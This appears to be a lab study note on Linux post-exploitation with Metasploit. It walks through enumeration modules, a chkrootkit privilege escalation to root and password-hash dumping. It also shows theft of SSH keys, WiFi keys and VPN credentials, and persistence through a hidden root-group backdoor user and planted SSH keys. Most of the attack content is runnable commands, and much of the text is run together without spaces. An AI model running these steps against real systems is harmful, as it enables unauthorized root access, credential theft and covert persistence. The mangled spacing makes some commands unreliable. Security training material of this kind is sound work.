# Network Enumerationnetstat-antp# if not workingss-tnlStateRecv-QSend-QLocalAddress:PortPeerAddress:PortLISTEN050*:445*:*LISTEN04096127.0.0.11:39389*:*LISTEN050*:139*:*LISTEN050:::445:::*LISTEN050:::139:::*
# List processespsaux# Enumerate environment variablesenv
Some Post Exploitation
Enumerate apps and services configuration files
exit# if the session dies, open a new onesessions-u1
searchenum_configsusepost/linux/gather/enum_configsinfo# Description:# This module collects configuration files found on commonly installed # applications and services, such as Apache, MySQL, Samba, Sendmail, # etc. If a config file is found in its default path, the module will # assume that is the file we want.sessions# Set the Meterpreter sessionsetSESSION4run# It will not migrate if it's already a x64 process
loot# Check the enumerated configuration files
Enumerate system environment variables
searchenvplatform:linuxusepost/multi/gather/envinfo# Description:# This module prints out the operating system environment variablessessionssetSESSION3run
Enumerate network information
searchenum_networkusepost/linux/gather/enum_networkinfo# Description:# This module gathers network information from the target system # IPTables rules, interfaces, wireless information, open and listening # ports, active network connections, DNS information and SSH # information.setSESSION3run
searchenum_protectionsusepost/linux/gather/enum_protectionsinfo# Description:# This module checks whether popular system hardening mechanisms are # in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also # tries to find installed applications that can be used to hinder, # prevent, or detect attacks, such as tripwire, snort, and apparmor. # This module is meant to identify Linux Secure Modules (LSM) in # addition to various antivirus, IDS/IPS, firewalls, sandboxes and # other security related software.setSESSION3run
notes# check above information stored within the MSFdb
Enumerate the system
searchenum_systemusepost/linux/gather/enum_systeminfo# Description:# This module gathers system information. We collect installed # packages, installed services, mount information, user list, user # bash history and cron jobssetSESSION3run
loot# Check the installed packages on the O.S.cat/root/.msf4/loot/20230422105452_Linux_PostExp_192.215.55.3_linux.enum.syste_557868.txt
Check if the target is a VM or a container
searchcheckcontainerusepost/linux/gather/checkcontainer# Description:# This module attempts to determine whether the system is running # inside of a container and if so, which one. This module supports # detection of Docker, LXC, and systemd nspawn.setSESSION3run [+] Thisappearstobea'Docker'container
📌 A Docker container can be exploited to break out of it and gain access to the host system.
Enumerate VM
searchcheckvmusepost/linux/gather/checkvmsetSESSION3run# The target is not a VM
Enumerate users history
searchenum_users_historyusepost/linux/gather/enum_users_history# Description:# This module gathers the following user-specific information: shell # history, MySQL history, PostgreSQL history, MongoDB history, Vim # history, lastlog, and sudoers.setSESSION3run# If this doesn't work, migrate to a "NT AUTHORITY\SYSTEM" user service
Background both the shell and the meterpreter session with CTRL+Z
Privilege Escalation
The technique will depend on the version of the target Linux Kernel and the distribution version.
It is necessary to manually enumerate a privesc vulnerable program, Chkrootkit v.0.49 in this case
searchchkrootkituseexploit/unix/local/chkrootkitinfo# Description:# Chkrootkit before 0.50 will run any executable file named # /tmp/update as root, allowing a trivial privilege escalation. # WfsDelay is set to 24h, since this is how often a chkrootkit scan is # scheduled by default.setCHKROOTKIT/bin/chkrootkitsetSESSION2setLHOST192.15.244.2sessions# check the used portsrun
Upgrade the shell cmd/unix sessions to a Meterpreter session
sessions-u1sessions2getuidServerusername:uid=0,gid=0,euid=0,egid=0# "root" user Meterpreter session
Linux user account hashes can be dumped using the privileged root user.
Terminate the shell session and background the meterpreter session.
Hashdump
📌 Linux password hashes are stored in the /etc/shadow file, accessible only by a user with root privileges.
In newer Linux, the hashed passwords are stored in the /etc/shadow file. In turn, the hashed password field in the /etc/passwd file is filled with the x character. /etc/passwd is readable by all the users.
Linux users' passphrases are hashed using the crypt function. The hashed passphrase follows a specific format: $id$salt$hashedpassword
post/linux/gather/hashdump module need to be run manually to dump the user account hashes and unshadow them
A hash can be cracked (with John the Ripper) or stored for later use
searchhashdumpusepost/linux/gather/hashdumpinfo# Description:# Post Module to dump the password hashes for all users on a Linux # SystemsetSESSION2run
Some Post Exploitation
Enumerate ssh directories
search ssh_creds
use post/multi/gather/ssh_creds
info
# Description:
# This module will collect the contents of all users' .ssh directories
# on the targeted machine. Additionally, known_hosts and
# authorized_keys and any other files are also downloaded. This module
# is largely based on firefox_creds.rb.
sessions
# Set the Meterpreter session
set SESSION 2
run
Enumerate users' .ecrypts directories
search ecryptfs_creds
use post/linux/gather/ecryptfs_creds
info
# Description:
# This module will collect the contents of all users' .ecrypts
# directories on the targeted machine. Collected "wrapped-passphrase"
# files can be cracked with John the Ripper (JtR) to recover "mount
# passphrases".
sessions
set SESSION 2
run
Enumerate WiFi credentials
search enum_psk
use post/linux/gather/enum_psk
info
# Description:
# This module collects 802-11-Wireless-Security credentials such as
# Access-Point name and Pre-Shared-Key from your target CLIENT Linux
# machine using /etc/NetworkManager/system-connections/ files. The
# module gathers NetworkManager's plaintext "psk" information.
set SESSION 2
run
Check for PPTP VPN chap-secrets credentials
search pptpd_chap_secrets
use post/linux/gather/pptpd_chap_secrets
info
# Description:
# This module collects PPTP VPN information such as client, server,
# password, and IP from your target server's chap-secrets file.
set SESSION 2
run
Perform SSH Persistence
search sshkey
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 2
run
search ssh_login
use auxiliary/scanner/ssh/ssh_login
options
set USERNAME jackie
set PASSWORD password
run
sessions
Upgrade the shell cmd/unix sessions to a Meterpreter session
sessions -u 1
Privilege Escalation
search chkrootkit
use exploit/unix/local/chkrootkit
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.101.97.2
run
# CTRL+Z to background the shell session
Upgrade the privileged session 3 to a Meterpreter session
sessions -u 3
sessions 4
SESSION 4 is a Meterpreter privileged session
Persistence
Create a backdoor user with administrative privileges that can be used to access the target system via SSH
shell
whoami
root
cat /etc/passwd
# Create a user that looks like a service account
# and add it to "root group"
useradd -m ftp -s /bin/bash
passwd ftp
password123
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
ftp : ftp root
❗ Changing user's password is a strong indicator of compromise, it should not be done.
Perform SSH Persistence with a Metasploit persistence modules
exit # CTRL+C
background
search platform:linux persistence
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 4
set CREATESSHFOLDER true
run
Access the private key and copy the content of the id_rsa file and save it as a new file. Assign the appropriate permissions to the file
